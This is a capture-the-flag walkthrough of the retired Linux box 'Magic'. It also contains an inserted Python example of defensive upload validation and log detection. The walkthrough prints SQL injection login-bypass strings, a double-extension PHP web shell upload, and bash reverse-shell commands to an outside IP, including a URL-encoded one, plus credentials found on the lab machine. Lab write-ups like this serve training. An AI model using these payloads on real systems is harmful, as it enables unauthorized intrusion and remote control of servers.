Magic is a retired machine running Linux. We are expected to obtain the user and root flags by exploiting its vulnerabilities.
We start with an nmap scan to fingerprint the target machine.
Classic scan
Full port scan
The port scan shows two open ports: 22/tcp (OpenSSH 7.6p1) and 80/tcp (Apache).
Let's enumerate port 80.
We enumerated the web application, checked Wappalyzer and examined the page source, but the only notable thing was a login page.
We started a gobuster scan to detect hidden files and directories to see what might be lurking.
Gobuster scan
We did not get any results in the Gobuster scan.
Let's go to the login.php page.
Here is the login screen. We looked at the source code and found nothing interesting. This is the input field for the credentials; since we have no valid credentials, we first try a SQL injection attack to bypass the login:
admin' or 1=1;-- -
admin' or '1=1;#
1' or '1'='1'))
admin'#
admin'-- -
We were able to log in successfully.
We were taken to an upload page.
Let's test the file upload area here, which is handled by PHP code.
We created an arbitrary file with touch and tried to upload it.
As far as we can tell, the upload only accepts jpg, jpeg and png extensions; let's see how to bypass this.
First, let's add an additional extension to the file.
I decided to append png to the end of the filename.
Let's try appending png to the filename.
When I uploaded the file as filetest.php.png it was accepted. Next, let's add a PHP shell by placing it in a comment of a PNG file.
Then we inserted php before the png extension, so that this PNG file is interpreted as PHP, and uploaded it.
Let's go to the location where the file was uploaded.
Here we appended ?cmd=id to the URL and it returned the output of id.
I'm trying to get it to give us a reverse shell.
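As an added defender-side example (not code from the original writeup), the following Python shows the upload validation that would have stopped the double-extension trick described above, and a simple detector for the resulting requests in Apache-style access logs. The /images/uploads/ path comes from the writeup; the log lines are constructed and all function names are assumptions.

```python
import re

ALLOWED_EXT = {"png", "jpg", "jpeg"}
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
PHP_TAGS = (b"<?php", b"<?=", b'<script language="php"')

def safe_filename(name: str) -> bool:
    """Allow exactly one extension from the whitelist; 'shell.php.png' fails."""
    if not name or "/" in name or "\\" in name or name.startswith("."):
        return False
    parts = name.split(".")
    return len(parts) == 2 and parts[0] != "" and parts[1].lower() in ALLOWED_EXT

def check_upload(name: str, data: bytes) -> str:
    """Return 'ok' or the reason the upload is rejected."""
    if not safe_filename(name):
        return "bad filename"
    if not (data.startswith(PNG_MAGIC) or data.startswith(JPEG_MAGIC)):
        return "not an image"
    if any(tag in data for tag in PHP_TAGS):  # PHP hidden in a PNG comment chunk
        return "embedded php"
    return "ok"

# Access-log detection: a request under /images/uploads/ whose filename carries a
# second extension before the image extension, or that has a cmd= query parameter.
_REQ = re.compile(r'"(?:GET|POST) (?P<path>/images/uploads/[^ ?"]+)(?P<qs>\?[^ "]*)?')

def flag_requests(log_lines):
    hits = []
    for line in log_lines:
        m = _REQ.search(line)
        if not m:
            continue
        path, qs = m.group("path"), m.group("qs") or ""
        double_ext = len(path.rsplit("/", 1)[-1].split(".")) > 2
        if double_ext or re.search(r"[?&]cmd=", qs):
            hits.append(path)
    return hits

# Constructed sample log lines (assumed format, not taken from the machine)
SAMPLE_LOG = [
    '10.10.14.19 - - [01/Jan/2024:10:00:00 +0000] "GET /images/uploads/shell.php.png?cmd=id HTTP/1.1" 200 51',
    '10.10.14.19 - - [01/Jan/2024:10:00:01 +0000] "GET /images/uploads/photo.png HTTP/1.1" 200 8123',
    '10.10.14.19 - - [01/Jan/2024:10:00:02 +0000] "GET /login.php HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    print(check_upload("shell.php.png", PNG_MAGIC + b"<?php echo 1; ?>"))  # bad filename
    print(flag_requests(SAMPLE_LOG))  # ['/images/uploads/shell.php.png']
```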
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.19/4747 0>&1'
We used this command, but it did not work because of the spaces and special characters, so we URL-encoded it:
http://10.10.10.185/images/uploads/shell.php.png?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.19%2F4747%200%3E%261%27
We sent this request and it worked.
This is how we got a shell.
In this shell we see that our privileges are limited, so we move on to local enumeration.
We did not find anything interesting with linpeas.sh, so we continued with manual local enumeration.
Here we obtained credentials from the db.php5 file:
theseus:iamkingtheseus
We tried to switch user with these credentials, but the login failed because the password is not valid for the system account.
This tells us that MySQL is running locally; let's check the listening network connections to confirm.
We confirmed that port 3306 is listening.
When we tried to connect to MySQL, the shell reported that there was no mysql client.
We typed mysql and pressed tab twice to see which MySQL binaries are installed.
After a little work with the show and dump options we were able to get a dump of the database.
From the dump we obtained credentials:
theseus:Th3s3usW4sK1ng
Let's switch user with this password.
We have successfully obtained the user flag, but we still do not have root privileges.
So let's continue with local enumeration.
The /bin/sysinfo file prints information about the system.
In its MEM Usage section the free command is executed, so we will hijack this free command to run bash and try to obtain root privileges that way.
We could not see any output here.
I think the commands are getting mixed up, so I'll have it give me a reverse shell instead:
bash -i >& /dev/tcp/10.10.14.19/1234 0>&1
I type the command.
This is how we got root privileges.